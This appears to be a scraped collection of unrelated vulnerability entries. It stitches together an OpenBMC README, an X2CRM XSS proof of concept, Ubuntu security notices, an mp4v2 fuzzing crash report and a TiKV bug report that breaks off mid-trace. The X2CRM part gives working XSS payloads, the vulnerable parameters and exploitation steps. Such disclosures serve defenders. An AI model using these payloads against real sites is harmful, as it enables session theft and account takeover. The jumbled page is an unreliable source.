In OpenBMC 2.9, crafted IPMI messages allow an attacker to cause a denial of service to the BMC via the netipmid (IPMI lan+) interface.

**OpenBMC**

OpenBMC is a Linux distribution for management controllers used in devices such as servers, top of rack switches or RAID appliances. It uses Yocto, OpenEmbedded, systemd, and D-Bus to allow easy customization for your platform.

**Setting up your OpenBMC project****1) Prerequisite**

See the Yocto documentation for the latest requirements

**Ubuntu**

sudo apt install git python3-distutils gcc g++ make file wget \\
    gawk diffstat bzip2 cpio chrpath zstd lz4 bzip2

**Fedora**

sudo dnf install git python3 gcc g++ gawk which bzip2 chrpath cpio \\
    hostname file diffutils diffstat lz4 wget zstd rpcgen patch

**2) Download the source**

git clone https://github.com/openbmc/openbmc
cd openbmc

**3) Target your hardware**

Any build requires an environment set up according to your hardware target. There is a special script in the root of this repository that can be used to configure the environment as needed. The script is called setup and takes the name of your hardware target as an argument.

The script needs to be sourced while in the top directory of the OpenBMC repository clone, and, if run without arguments, will display the list of supported hardware targets, see the following example:

    $ . setup <machine> [build_dir]
    Target machine must be specified. Use one of:
    
    bletchley               mori                    s8036
    dl360poc                mtjade                  swift
    e3c246d4i               mtmitchell              tatlin-archive-x86
    ethanolx                nicole                  tiogapass
    evb-ast2500             olympus-nuvoton         transformers
    evb-ast2600             on5263m5                vegman-n110
    evb-npcm750             p10bmc                  vegman-rx20
    f0b                     palmetto                vegman-sx20
    fp5280g2                qcom-dc-scm-v1          witherspoon
    g220a                   quanta-q71l             witherspoon-tacoma
    gbs                     romed8hm3               x11spi
    greatlakes              romulus                 yosemitev2
    gsj                     s2600wf                 zaius
    kudo                    s6q
    lannister               s7106
    

Once you know the target (e.g. romulus), source the setup script as follows:

**4) Build**

bitbake obmc-phosphor-image

Additional details can be found in the docs repository.

**OpenBMC Development**

The OpenBMC community maintains a set of tutorials new users can go through to get up to speed on OpenBMC development out here

**Build Validation and Testing**

Commits submitted by members of the OpenBMC GitHub community are compiled and tested via our Jenkins server. Commits are run through two levels of testing. At the repository level the makefile make check directive is run. At the system level, the commit is built into a firmware image and run with an arm-softmmu QEMU model against a barrage of CI tests.

Commits submitted by non-members do not automatically proceed through CI testing. After visual inspection of the commit, a CI run can be manually performed by the reviewer.

Automated testing against the QEMU model along with supported systems are performed. The OpenBMC project uses the Robot Framework for all automation. Our complete test repository can be found here.

**Submitting Patches**

Support of additional hardware and software packages is always welcome. Please follow the contributing guidelines when making a submission. It is expected that contributions contain test cases.

**Bug Reporting**

Issues are managed on GitHub. It is recommended you search through the issues before opening a new one.

**Questions**

First, please do a search on the internet. There's a good chance your question has already been asked.

For general questions, please use the openbmc tag on Stack Overflow. Please review the discussion on Stack Overflow licensing before posting any code.

For technical discussions, please see contact info below for Discord and mailing list information. Please don't file an issue to ask a question. You'll get faster results by using the mailing list or Discord.

**Will OpenBMC run on my Acme Server Corp. XYZ5000 motherboard?**

This is a common question, particularly regarding boards from popular COTS (commercial off-the-shelf) vendors such as Supermicro and ASRock. You can see the list of supported boards by running . setup (with no further arguments) in the root of the OpenBMC source tree. Most of the platforms supported by OpenBMC are specialized servers operated by companies running large datacenters, but some more generic COTS servers are supported to varying degrees.

If your motherboard is not listed in the output of . setup it is not currently supported. Porting OpenBMC to a new platform is a non-trivial undertaking, ideally done with the assistance of schematics and other documentation from the manufacturer (it is not completely infeasible to take on a porting effort without documentation via reverse engineering, but it is considerably more difficult, and probably involves a greater risk of hardware damage).

**However**, even if your motherboard is among those listed in the output of . setup, there are two significant caveats to bear in mind. First, not all ports are equally mature -- some platforms are better supported than others, and functionality on some "supported" boards may be fairly limited. Second, support for a motherboard is not the same as support for a complete system -- in particular, fan control is critically dependent on not just the motherboard but also the fans connected to it and the chassis that the board and fans are housed in, both of which can vary dramatically between systems using the same board model. So while you may be able to compile and install an OpenBMC build on your system and get some basic functionality, rough edges (such as your cooling fans running continuously at full throttle) are likely.

**Features of OpenBMC****Feature List**

*   Host management: Power, Cooling, LEDs, Inventory, Events, Watchdog
*   Full IPMI 2.0 Compliance with DCMI
*   Code Update Support for multiple BMC/BIOS images
*   Web-based user interface
*   REST interfaces
*   D-Bus based interfaces
*   SSH based SOL
*   Remote KVM
*   Hardware Simulation
*   Automated Testing
*   User management
*   Virtual media

**Features In Progress**

*   OpenCompute Redfish Compliance
*   Verified Boot

**Features Requested but need help**

*   OpenBMC performance monitoring

**Finding out more**

Dive deeper into OpenBMC by opening the docs repository.

**Technical Steering Committee**

The Technical Steering Committee (TSC) guides the project. Members are:

*   Roxanne Clarke, IBM
*   Nancy Yuen, Google
*   Patrick Williams, Meta
*   Terry Duncan, Intel
*   Sagar Dharia, Microsoft
*   Samer El-Haj-Mahmoud, Arm

**Contact**

*   Mail: openbmc@lists.ozlabs.org https://lists.ozlabs.org/listinfo/openbmc
*   Discord: https://discord.gg/69Km47zH98

CVE-2021-39295: GitHub - openbmc/openbmc: OpenBMC Distribution

X2CRM Open Source Sales CRM 6.6 and 6.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Create Action function, aka an index.php/actions/update URI.

    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: Actions[subject]# CVE: CVE-2022-48178# Date: 27.12.2022'''POC REQUEST:========POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 172Origin: http://localhostConnection: closeReferer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsrSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originYII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=testEXPLOITATION========1. Create an action2. Inject payload to the vulnerable parameter in POST requestPayload: %3Cscript%3Ealert(1)%3C%2Fscript%3E'''# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: model# CVE: Use CVE-2022-48177# Date: 27.12.2022'''POC REQUEST:========GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1EXPLOITATION========1. Select Import Records Model in admin settings2. Inject payload to the vulnerable parameter in GET requestPayload: "><body onload="alert(4)">'''

CVE-2022-48178: X2CRM 6.6 / 6.9 Cross Site Scripting ≈ Packet Storm

Ubuntu Security Notice 6021-1 - It was discovered that Chromium did not properly manage memory in several components. A remote attacker could possibly use this issue to corrupt memory via a crafted HTML page, resulting in a denial of service, or possibly execute arbitrary code. It was discovered that Chromium could be made to access memory out of bounds in WebHID. A remote attacker could possibly use this issue to corrupt memory via a malicious HID device, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6021-1April 14, 2023chromium-browser vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Chromium.Software Description:- chromium-browser: Chromium web browser, open-source version of ChromeDetails:It was discovered that Chromium did not properly manage memory in severalcomponents. A remote attacker could possibly use this issue to corruptmemory via a crafted HTML page, resulting in a denial of service, orpossibly execute arbitrary code. (CVE-2023-1528, CVE-2023-1530,CVE-2023-1531, CVE-2023-1533, CVE-2023-1811, CVE-2023-1815, CVE-2023-1818)It was discovered that Chromium could be made to access memory out ofbounds in WebHID. A remote attacker could possibly use this issue tocorrupt memory via a malicious HID device, resulting in a denial ofservice, or possibly execute arbitrary code. (CVE-2023-1529)It was discovered that Chromium could be made to access memory out ofbounds in several components. A remote attacker could possibly use thisissue to corrupt memory via a crafted HTML page, resulting in a denial ofservice, or possibly execute arbitrary code. (CVE-2023-1532,CVE-2023-1534, CVE-2023-1810, CVE-2023-1812, CVE-2023-1819, CVE-2023-1820)It was discovered that Chromium contained an inappropriate implementationin the Extensions component. A remote attacker who convinced a user toinstall a malicious extension could possibly use this issue to bypass fileaccess restrictions via a crafted HTML page. (CVE-2023-1813)It was discovered that Chromium did not properly validate untrusted inputin the Safe Browsing component. A remote attacker could possibly use thisissue to bypass download checking via a crafted HTML page. (CVE-2023-1814)It was discovered that Chromium contained an inappropriate implementationin the Picture In Picture component. A remote attacker could possibly usethis issue to perform navigation spoofing via a crafted HTML page.(CVE-2023-1816)It was discovered that Chromium contained an inappropriate implementationin the WebShare component. A remote attacker could possibly use this issueto hide the contents of the Omnibox (URL bar) via a crafted HTML page.(CVE-2023-1821)It was discovered that Chromium contained an inappropriate implementationin the Navigation component. A remote attacker could possibly use thisissue to perform domain spoofing via a crafted HTML page. (CVE-2023-1822)It was discovered that Chromium contained an inappropriate implementationin the FedCM component. A remote attacker could possibly use this issue tobypass navigation restrictions via a crafted HTML page. (CVE-2023-1823)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   chromium-browser                112.0.5615.49-0ubuntu0.18.04.1This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:   https://ubuntu.com/security/notices/USN-6021-1   CVE-2023-1528, CVE-2023-1529, CVE-2023-1530, CVE-2023-1531,   CVE-2023-1532, CVE-2023-1533, CVE-2023-1534, CVE-2023-1810,   CVE-2023-1811, CVE-2023-1812, CVE-2023-1813, CVE-2023-1814,   CVE-2023-1815, CVE-2023-1816, CVE-2023-1818, CVE-2023-1819,   CVE-2023-1820, CVE-2023-1821, CVE-2023-1822, CVE-2023-1823Package Information:https://launchpad.net/ubuntu/+source/chromium-browser/112.0.5615.49-0ubuntu0.18.04.1

Ubuntu Security Notice USN-6021-1

Ubuntu Security Notice 6020-1 - It was discovered that the System V IPC implementation in the Linux kernel did not properly handle large shared memory counts. A local attacker could use this to cause a denial of service. It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs.

==========================================================================  
Ubuntu Security Notice USN-6020-1  
April 14, 2023

linux-bluefield vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-bluefield: Linux kernel for NVIDIA BlueField platforms

Details:

It was discovered that the System V IPC implementation in the Linux kernel  
did not properly handle large shared memory counts. A local attacker could  
use this to cause a denial of service (memory exhaustion). (CVE-2021-3669)

It was discovered that the KVM VMX implementation in the Linux kernel did  
not properly handle indirect branch prediction isolation between L1 and L2  
VMs. An attacker in a guest VM could use this to expose sensitive  
information from the host OS or other guest VMs. (CVE-2022-2196)

Gerald Lee discovered that the USB Gadget file system implementation in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability in some situations. A local attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-4382)

It was discovered that the RNDIS USB driver in the Linux kernel contained  
an integer overflow vulnerability. A local attacker with physical access  
could plug in a malicious USB device to cause a denial of service (system  
crash) or possibly execute arbitrary code. (CVE-2023-23559)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1060-bluefield  5.4.0-1060.66  
   linux-image-bluefield           5.4.0.1060.55

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6020-1  
   CVE-2021-3669, CVE-2022-2196, CVE-2022-4382, CVE-2023-23559

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1060.66

Ubuntu Security Notice USN-6020-1

Ubuntu Security Notice 6018-1 - Chen Lu, Lei Wang, and YiQi Sun discovered a privilege escalation vulnerability in apport-cli when viewing crash reports and unprivileged users are allowed to run sudo less. A local attacker on a specially configured system could use this to escalate their privilege.

==========================================================================  
Ubuntu Security Notice USN-6018-1  
April 13, 2023

apport vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Apport could be used to escalate privilege on specially configured  
systems.

Software Description:  
- apport: automatically generate crash reports for debugging

Details:

Chen Lu, Lei Wang, and YiQi Sun discovered a privilege escalation  
vulnerability in apport-cli when viewing crash reports and unprivileged  
users are allowed to run sudo less. A local attacker on a specially  
configured system could use this to escalate their privilege.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
apport 2.23.1-0ubuntu3.2

Ubuntu 22.04 LTS:  
apport 2.20.11-0ubuntu82.4

Ubuntu 20.04 LTS:  
apport 2.20.11-0ubuntu27.26

Ubuntu 18.04 LTS:  
apport 2.20.9-0ubuntu7.29

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6018-1  
CVE-2023-1326, https://launchpad.net/bugs/2016023

Package Information:  
https://launchpad.net/ubuntu/+source/apport/2.23.1-0ubuntu3.2  
https://launchpad.net/ubuntu/+source/apport/2.20.11-0ubuntu82.4  
https://launchpad.net/ubuntu/+source/apport/2.20.11-0ubuntu27.26  
https://launchpad.net/ubuntu/+source/apport/2.20.9-0ubuntu7.29

Ubuntu Security Notice USN-6018-1

Ubuntu Security Notice 6019-1 - It was discovered that Flask-CORS did not properly escape paths before evaluating resource rules. An attacker could possibly use this to expose sensitive information.

    =========================================================================Ubuntu Security Notice USN-6019-1April 13, 2023python-flask-cors vulnerability=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Applications using Flask-CORS could be made to expose sensitiveinformation.Software Description:- python-flask-cors: Flask extension for handling Cross Origin Resource Sharing (CORS)Details:It was discovered that Flask-CORS did not properly escape paths beforeevaluating resource rules. An attacker could possibly use this toexpose sensitive information.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  python3-flask-cors              3.0.8-2ubuntu0.1After a standard system update you need to restart application usingFlask-CORS to make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6019-1  CVE-2020-25032Package Information:  https://launchpad.net/ubuntu/+source/python-flask-cors/3.0.8-2ubuntu0.1

Ubuntu Security Notice USN-6019-1

Ubuntu Security Notice 6017-1 - Hadrien Perrineau discovered that Ghostscript incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6017-1  
April 13, 2023

ghostscript vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

Ghostscript could be made to crash or run programs as your login if it  
received a specially crafted input.

Software Description:  
- ghostscript: PostScript and PDF interpreter

Details:

Hadrien Perrineau discovered that Ghostscript incorrectly handled certain  
inputs. An attacker could possibly use this issue to cause a denial of  
service, or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   ghostscript                     9.56.1~dfsg1-0ubuntu3.1  
   libgs9                          9.56.1~dfsg1-0ubuntu3.1

Ubuntu 22.04 LTS:  
   ghostscript                     9.55.0~dfsg1-0ubuntu5.2  
   libgs9                          9.55.0~dfsg1-0ubuntu5.2

Ubuntu 20.04 LTS:  
   ghostscript                     9.50~dfsg-5ubuntu4.7  
   libgs9                          9.50~dfsg-5ubuntu4.7

Ubuntu 18.04 LTS:  
   ghostscript                     9.26~dfsg+0-0ubuntu0.18.04.18  
   libgs9                          9.26~dfsg+0-0ubuntu0.18.04.18

Ubuntu 16.04 ESM:  
   ghostscript                     9.26~dfsg+0-0ubuntu0.16.04.14+esm5  
   libgs9                          9.26~dfsg+0-0ubuntu0.16.04.14+esm5

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6017-1  
   CVE-2023-28879

Package Information:  
   https://launchpad.net/ubuntu/+source/ghostscript/9.56.1~dfsg1-0ubuntu3.1  
   https://launchpad.net/ubuntu/+source/ghostscript/9.55.0~dfsg1-0ubuntu5.2  
   https://launchpad.net/ubuntu/+source/ghostscript/9.50~dfsg-5ubuntu4.7

 https://launchpad.net/ubuntu/+source/ghostscript/9.26~dfsg+0-0ubuntu0.18.04.18

Ubuntu Security Notice USN-6017-1

Ubuntu Security Notice 6016-1 - It was discovered that thenify incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6016-1  
April 13, 2023

node-thenify vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

A security issue weas fixed in thenify.

Software Description:  
- node-thenify: Promisify a callback-based function

Details:

It was discovered that thenify incorrectly handled certain inputs. If a  
user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   node-thenify                    3.3.0-1+deb10u1build0.20.04.1

Ubuntu 18.04 LTS:  
   node-thenify                    3.3.0-1+deb10u1build0.18.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6016-1  
   CVE-2020-7677

Package Information:

 https://launchpad.net/ubuntu/+source/node-thenify/3.3.0-1+deb10u1build0.20.04.1

 https://launchpad.net/ubuntu/+source/node-thenify/3.3.0-1+deb10u1build0.18.04.1

Ubuntu Security Notice USN-6016-1

mp4v2 v2.0.0 was discovered to contain a heap buffer overflow via the MP4GetVideoProfileLevel function at /src/mp4.cpp.

**Heap-buffer-overflow mp4v2/src/mp4.cpp:519:33 in MP4GetVideoProfileLevel****project address**

https://github.com/enzo1982/mp4v2

**info**

OS：Ubuntu20.04 TLS

Build: cmake . && make

mp4info - MP4v2 2.1.2

**Poc**

https://github.com/z1r00/fuzz\_vuln/blob/main/mp4v2/heap-buffer-overflow/MP4GetVideoProfileLevel/id:000000%2Csig:06%2Csrc:000758%2Ctime:1159607%2Cexecs:323115%2Cop:havoc%2Crep:8

**ASAN Info**

./mp4info id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8

mp4v2/mp4info version 2.1.2
mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8:
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": atom type �ods is suspect
Read: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": Mandatory descriptor 0x06 missing
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": invalid atom size, extends outside parent atom - skipping to end of "hinf" "dmax" 8458446 vs 4584
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": invalid atom size, extends outside parent atom - skipping to end of "stbl" "" 1953728578 vs 9686
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": atom type  is suspect
ReadChildAtoms: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": In atom stbl missing child atom stsc
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": invalid atom size, extends outside parent atom - skipping to end of "moov" "�Ѱ>" 4026601461 vs 11495
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": atom type �Ѱ> is suspect
ReadAtom: "mp4v2\_fuzzing/mp4info\_out/fuzzer1/crashes/id:000000,sig:06,src:000758,time:1159607,execs:323115,op:havoc,rep:8": invalid atom size, extends outside parent atom - skipping to end of "" "miso" 829005910 vs 11597
MP4Track: invalid track (/home/z1r0/fuzzing/mp4v2/src/mp4track.cpp,239)
FindIntegerProperty: no such property - moov.iods.visualProfileLevelId (/home/z1r0/fuzzing/mp4v2/src/mp4file.cpp,831)
=================================================================
==168994==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000006190 at pc 0x7f0bc7cb947d bp 0x7ffd0e2ca310 sp 0x7ffd0e2ca308
READ of size 4 at 0x602000006190 thread T0
    #0 0x7f0bc7cb947c in MP4GetVideoProfileLevel /home/z1r0/fuzzing/mp4v2/src/mp4.cpp:519:33
    #1 0x7f0bc7d276bc in mp4v2::impl::PrintVideoInfo(void\*, unsigned int) /home/z1r0/fuzzing/mp4v2/src/mp4info.cpp:404:20
    #2 0x7f0bc7d276bc in mp4v2::impl::PrintTrackInfo(void\*, unsigned int) /home/z1r0/fuzzing/mp4v2/src/mp4info.cpp:543:21
    #3 0x7f0bc7d26889 in MP4Info /home/z1r0/fuzzing/mp4v2/src/mp4info.cpp:596:39
    #4 0x7f0bc7d28b82 in MP4FileInfo /home/z1r0/fuzzing/mp4v2/src/mp4info.cpp:627:18
    #5 0x5560e33e3b41 in main /home/z1r0/fuzzing/mp4v2/util/mp4info.cpp:77:22
    #6 0x7f0bc752e082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #7 0x5560e32b451d in \_start (/home/z1r0/fuzzing/mp4v2/mp4info+0x2151d)

0x602000006191 is located 0 bytes after 1-byte region \[0x602000006190,0x602000006191)
allocated by thread T0 here:
    #0 0x5560e33991a7 in malloc /home/aep/Downloads/llvm-project-llvmorg-17\-init/compiler-rt/lib/asan/asan\_malloc\_linux.cpp:69:3
    #1 0x7f0bc7c1a3c2 in mp4v2::impl::MP4Malloc(unsigned long) /home/z1r0/fuzzing/mp4v2/./src/mp4util.h:63:15
    #2 0x7f0bc7d0c84f in mp4v2::impl::MP4BytesProperty::GetValue(unsigned char\*\*, unsigned int\*, unsigned int) /home/z1r0/fuzzing/mp4v2/src/mp4property.h:479:30
    #3 0x7f0bc7d0c84f in mp4v2::impl::MP4File::GetBytesProperty(char const\*, unsigned char\*\*, unsigned int\*) /home/z1r0/fuzzing/mp4v2/src/mp4file.cpp:1004:37
    #4 0x7f0bc7d0c84f in mp4v2::impl::MP4File::GetTrackBytesProperty(unsigned int, char const\*, unsigned char\*\*, unsigned int\*) /home/z1r0/fuzzing/mp4v2/src/mp4file.cpp:3254:5
    #5 0x7f0bc7d11586 in mp4v2::impl::MP4File::GetTrackESConfiguration(unsigned int, unsigned char\*\*, unsigned int\*) /home/z1r0/fuzzing/mp4v2/src/mp4file.cpp:3668:9

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/z1r0/fuzzing/mp4v2/src/mp4.cpp:519:33 in MP4GetVideoProfileLevel
Shadow bytes around the buggy address:
  0x602000005f00: fa fa 04 fa fa fa 01 fa fa fa fd fd fa fa 04 fa
  0x602000005f80: fa fa 04 fa fa fa 04 fa fa fa fd fa fa fa 00 00
  0x602000006000: fa fa 00 fa fa fa 04 fa fa fa 00 00 fa fa 00 fa
  0x602000006080: fa fa 04 fa fa fa 00 00 fa fa 00 fa fa fa 04 fa
  0x602000006100: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 00
=>0x602000006180: fa fa\[01\]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x602000006400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==168994==ABORTING

**Reference**

https://github.com/z1r00/fuzz\_vuln/blob/main/mp4v2/heap-buffer-overflow/MP4GetVideoProfileLevel/readme.md

CVE-2023-29584: Heap-buffer-overflow mp4v2/src/mp4.cpp:519:33 in MP4GetVideoProfileLevel · Issue #30 · enzo1982/mp4v2

TiKV 6.1.2 allows remote attackers to cause a denial of service (fatal error) upon an attempt to get a timestamp from the Placement Driver.

**Bug Report****What version of TiKV are you using?**

v6.1.2

**What operating system and CPU are you using?**

ubuntu

**Steps to reproduce**

Run Jepsen test configured with kill, pause and membership nemesis

**What did you expect?**

No fatal

**What happened?**

[2023/03/16 15:24:47.529 +00:00] [FATAL] [lib.rs:491] ["failed to get timestamp from PD: Other(\"[components/pd_client/src/tso.rs:97]: Timestamp channel is dropped\")"] [backtrace="   0: tikv_util::set_panic_hook::{{closure}}\n             at /opt/tikv/components/tikv_util/src/lib.rs:490:18\n   1: std::panicking::rust_panic_with_hook\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/panicking.rs:702:17\n   2: std::panicking::begin_panic_handler::{{closure}}\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/panicking.rs:588:13\n   3: std::sys_common::backtrace::__rust_end_short_backtrace\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/sys_common/backtrace.rs:138:18\n   4: rust_begin_unwind\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/std/src/panicking.rs:584:5\n   5: core::panicking::panic_fmt\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/core/src/panicking.rs:143:14\n   6: core::result::unwrap_failed\n             at /rustc/1e12aef3fab243407f9d71ba9956cb2a1bf105d5/library/core/src/result.rs:1749:5\n   7: 